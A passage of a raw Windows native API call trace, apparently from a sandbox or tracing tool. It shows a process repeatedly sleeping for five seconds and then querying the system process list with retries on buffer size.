NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.860] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.868] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.912] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.964] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 